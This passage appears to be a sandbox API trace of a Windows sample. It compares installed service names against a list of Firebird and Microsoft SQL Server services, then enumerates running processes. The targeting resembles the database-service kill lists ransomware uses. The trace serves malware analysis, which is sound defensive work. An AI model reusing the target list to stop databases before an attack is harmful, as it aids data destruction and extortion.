lpString2="Dhcp") returned 1 [0053.330] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0053.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0053.330] lstrlenW (lpString="Dnscache") returned 8 [0053.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0053.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0053.330] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0053.330] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0053.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0053.330] lstrlenW (lpString="DoSvc") returned 5 [0053.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0053.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0053.330] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0053.330] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0053.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0053.331] lstrlenW (lpString="DPS") returned 3 [0053.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0053.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0053.331] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0053.331] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0053.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0053.331] lstrlenW (lpString="DusmSvc") returned 7 [0053.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0053.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0053.331] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0053.331] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0053.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0053.331] lstrlenW (lpString="EventLog") returned 8 [0053.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0053.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0053.331] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0053.331] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0053.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0053.331] lstrlenW (lpString="EventSystem") returned 11 [0053.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0053.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0053.331] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0053.331] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0053.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0053.331] lstrlenW (lpString="FontCache") returned 9 [0053.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0053.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0053.331] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0053.331] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0053.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0053.331] lstrlenW (lpString="gpsvc") returned 5 [0053.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0053.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0053.331] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0053.331] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0053.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0053.332] lstrlenW (lpString="iphlpsvc") returned 8 [0053.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0053.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0053.332] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0053.332] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0053.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0053.332] lstrlenW (lpString="KeyIso") returned 6 [0053.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0053.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0053.332] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0053.332] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0053.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0053.332] lstrlenW (lpString="LanmanServer") returned 12 [0053.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0053.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0053.332] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0053.332] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0053.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0053.332] lstrlenW (lpString="LanmanWorkstation") returned 17 [0053.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0053.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0053.332] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0053.332] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0053.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0053.332] lstrlenW (lpString="lfsvc") returned 5 [0053.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0053.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0053.332] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0053.332] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0053.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0053.332] lstrlenW (lpString="lmhosts") returned 7 [0053.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0053.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0053.332] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0053.332] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0053.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0053.333] lstrlenW (lpString="LSM") returned 3 [0053.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0053.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0053.333] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0053.333] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0053.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0053.333] lstrlenW (lpString="MpsSvc") returned 6 [0053.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0053.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0053.333] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0053.333] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0053.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0053.333] lstrlenW (lpString="NcbService") returned 10 [0053.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0053.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0053.333] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0053.333] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0053.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0053.333] lstrlenW (lpString="netprofm") returned 8 [0053.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0053.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0053.333] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0053.333] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0053.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0053.333] lstrlenW (lpString="NlaSvc") returned 6 [0053.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0053.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0053.333] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0053.333] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0053.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0053.333] lstrlenW (lpString="nsi") returned 3 [0053.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0053.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0053.333] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0053.333] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0053.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0053.334] lstrlenW (lpString="PcaSvc") returned 6 [0053.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0053.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0053.334] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0053.334] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0053.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0053.334] lstrlenW (lpString="PlugPlay") returned 8 [0053.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0053.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0053.334] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0053.334] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0053.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0053.334] lstrlenW (lpString="Power") returned 5 [0053.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0053.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0053.334] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0053.334] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0053.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0053.334] lstrlenW (lpString="ProfSvc") returned 7 [0053.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0053.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0053.334] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0053.334] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0053.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0053.334] lstrlenW (lpString="RpcEptMapper") returned 12 [0053.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0053.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0053.334] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0053.334] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0053.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0053.334] lstrlenW (lpString="RpcSs") returned 5 [0053.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0053.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0053.334] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0053.334] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0053.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0053.334] lstrlenW (lpString="SamSs") returned 5 [0053.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0053.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0053.335] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0053.335] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0053.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0053.335] lstrlenW (lpString="Schedule") returned 8 [0053.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0053.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0053.335] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0053.335] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0053.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0053.335] lstrlenW (lpString="SecurityHealthService") returned 21 [0053.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0053.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0053.335] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0053.335] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0053.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0053.335] lstrlenW (lpString="SENS") returned 4 [0053.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0053.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0053.335] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0053.335] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0053.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0053.335] lstrlenW (lpString="ShellHWDetection") returned 16 [0053.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0053.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0053.335] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0053.335] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0053.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0053.335] lstrlenW (lpString="Spooler") returned 7 [0053.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0053.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0053.335] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0053.335] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0053.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0053.335] lstrlenW (lpString="SSDPSRV") returned 7 [0053.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0053.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0053.336] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0053.336] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0053.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0053.336] lstrlenW (lpString="StateRepository") returned 15 [0053.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0053.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0053.336] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0053.336] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0053.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0053.336] lstrlenW (lpString="SysMain") returned 7 [0053.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0053.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0053.336] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0053.336] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0053.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0053.336] lstrlenW (lpString="SystemEventsBroker") returned 18 [0053.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0053.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0053.336] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0053.336] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0053.336] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x636198 | out: hHeap=0x5d0000) returned 1 [0053.336] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x324 [0053.339] Process32FirstW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0053.340] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0053.341] lstrlenW (lpString="System") returned 6 [0053.341] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0053.342] lstrlenW (lpString="smss.exe") returned 8 [0053.342] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.342] lstrlenW (lpString="csrss.exe") returned 9 [0053.342] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0053.343] lstrlenW (lpString="wininit.exe") returned 11 [0053.343] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.344] lstrlenW (lpString="csrss.exe") returned 9 [0053.344] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0053.344] lstrlenW (lpString="winlogon.exe") returned 12 [0053.344] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0053.345] lstrlenW (lpString="services.exe") returned 12 [0053.345] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0053.346] lstrlenW (lpString="lsass.exe") returned 9 [0053.346] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.346] lstrlenW (lpString="svchost.exe") returned 11 [0053.346] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0053.347] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0053.347] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0053.348] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0053.348] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.348] lstrlenW (lpString="svchost.exe") returned 11 [0053.348] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0053.349] lstrlenW (lpString="dwm.exe") returned 7 [0053.349] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.350] lstrlenW (lpString="svchost.exe") returned 11 [0053.350] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.350] lstrlenW (lpString="svchost.exe") returned 11 [0053.350] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.351] lstrlenW (lpString="svchost.exe") returned 11 [0053.351] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.352] lstrlenW (lpString="svchost.exe") returned 11 [0053.352] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.352] lstrlenW (lpString="svchost.exe") returned 11 [0053.352] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.353] lstrlenW (lpString="svchost.exe") returned 11 [0053.353] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.354] lstrlenW (lpString="svchost.exe") returned 11 [0053.354] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.354] lstrlenW (lpString="svchost.exe") returned 11 [0053.354] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.355] lstrlenW (lpString="svchost.exe") returned 11 [0053.355] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0053.356] lstrlenW (lpString="spoolsv.exe") returned 11 [0053.356] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.356] lstrlenW (lpString="svchost.exe") returned 11 [0053.356] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, 